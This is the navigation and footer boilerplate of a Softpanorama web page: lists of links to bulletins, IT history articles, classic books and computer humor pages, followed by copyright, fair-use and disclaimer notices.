Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 : Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law
History:
Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds : Larry Wall : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOS : Programming Languages History : PL/1 : Simula 67 : C : History of GCC development : Scripting Languages : Perl history : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history
Classic books:
The Peter Principle : Parkinson Law : 1984 : The Mythical Man-Month : How to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite
Most popular humor pages:
Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor
The Last but not Least Technology is dominated by two types of people: those who understand what they do not manage and those who manage what they do not understand ~Archibald Putt. Ph.D
Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.
This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...
|
|
You can use PayPal to to buy a cup of coffee for authors of this site |
Disclaimer:
The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the Softpanorama society. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.
Last modified: March 12, 2019
